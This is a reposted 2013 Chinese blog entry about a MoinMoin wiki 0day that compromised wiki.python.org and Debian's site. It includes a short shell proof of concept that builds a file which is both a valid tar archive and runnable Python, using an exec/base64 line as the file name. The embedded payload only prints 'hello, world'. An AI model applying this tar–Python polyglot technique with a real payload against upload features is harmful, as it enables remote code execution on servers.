CWYAlpha

Just another WordPress.com site

Thought this was cool: moin moin wiki的0day,日了python.org,再日debian.org。

leave a comment »


Python声明

http://pyfound.blogspot.com/2013/01/wikipythonorg-compromised.html

Debian声明

http://lists.debian.org/debian-devel-announce/2013/01/msg00000.html

$ touch "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"            
$ tar cf result.py !$
tar cf result.py "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"
$ python result.py 
hello, world
$ tar xvf result.py
x exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')
$ 

这个是0day的PoC。。。。

简单的说,就是一个上传,既是合法的tar文件,又是合法的python代码。omg碉堡了。

今天Ruby on Rails也被日了。

什么时候来日django?

via 1, 2, 3

from est's blog: http://blog.est.im/post/40066246146

Written by cwyalpha

一月 9, 2013 在 7:52 上午

发表在 Uncategorized

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s

%d 博主赞过: